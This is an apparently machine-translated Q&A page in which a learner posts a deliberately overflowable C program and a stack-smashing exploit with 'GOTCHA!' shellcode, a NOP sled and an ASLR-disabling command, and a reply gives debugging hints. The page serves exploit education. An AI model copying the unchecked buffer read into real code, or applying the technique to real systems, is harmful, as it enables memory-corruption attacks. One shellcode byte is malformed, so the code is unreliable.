Question

我有2个程序，我正在尝试做一些堆栈粉碎。

vuln.c

#include <stdlib.h>
#include <stdio.h>
int bof()
{
    char buffer[8];
    FILE *badfile;
    badfile = fopen( "badfile", "r" );
    fread( buffer, sizeof( char ), 1024, badfile );
    return 1;
}

int main( int argc, char **argv)
{
    bof();
    printf("Not gonna do it! \n");
    return 1;
}

exploit.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
 "\xeb\x16"
 "\x31\xdb"
 "\x31\xd2"
 "\x31\xc0"
 "\x59"
 "\xbb\x01\x00\x00\x00"
 "\xb2\x09"
 "\xb0\x04"
 "\xcd\x80"
 "\xb0\x01"
 "\xcd\x80"
 "xe8\xe5\xff\xff\xff"
 "GOTCHA!\n";

#define OFFSET 1500

    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }

    unsigned long get_ESP(void)
    {
          __asm__("movl %ESP,%EAX");
    }

    int main(int argc, char **argv)
    {
      unsigned int addr;
      FILE *badfile;
      char buffer[1024];
      addr = get_ESP()+OFFSET;
      fprintf(stderr, "Using Offset: 0x%x\nShell code size: %lx\n",addr, sizeof(shellcode));
      memset(&buffer, 0x90, 1024);
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ], shellcode,sizeof(shellcode) );
      badfile = fopen("./badfile","w");
      fwrite(buffer,1024,1,badfile);
      fclose(badfile);

    }

我使用这些命令gcc vuln.c -fno-stack-protector -o vuln和gcc exploit.c -fno-stack-protector -o exploit在我的Macbook上编译了这个。我然后运行vuln，它运行正常，然后利用并获得此输出：

Using Offset: 0x6acd6814
Shell code size: 28

然后我用od -t x2 badfile破坏了文件，所以最终看起来像这样：

bash-3.2# cat badfile
????????????h?j?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Y??   ?̀?̀xe8????GOTCHA!

我正在尝试利用漏洞程序，所以打印GOTCHA！我现在正在Bus error: 10。谁能给我一个关于我哪里出错的提示？

的的 __ _ __ _ __ _ __ _ __ _ __ _ __ _ __ _ _ 更新的 _ __ _ __ _ _

我尝试了与BT5相同的程序。使用echo 0 > /proc/sys/kernel/randomize_va_space禁用ASLR。

我仍然无法弄清楚为什么这不起作用。我在gdb中运行时得到了这个：

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)

我是否正确地尝试过这个？

Answer 1

我不确定OSX有什么样的保护 - 这可能会在Linux机器上运行得更好。

无论如何，基本的想法看起来没问题 - 你的易受攻击的程序会打开一个大文件并将其转储到一个很小的数组中。问题似乎是您的文件创建。

当您获得ESP时，您将获得当前程序的堆栈指针。这与易受攻击的程序没有关系，除非堆栈的设置完全相同（不是这样）。

更好的方法是在gdb中执行易受攻击的程序，直到你点击bof（）并查看堆栈指针。如果这是一致的，那么你就赢了。如果它是随机的（我的猜测就是它），那么你将需要使用你的nop-sled并希望。

在32位机器上，堆栈随机化并不是太多，反复尝试利用最终会让你成功攻击。

祝你好运！

C溢出需要一些方向

1 个答案: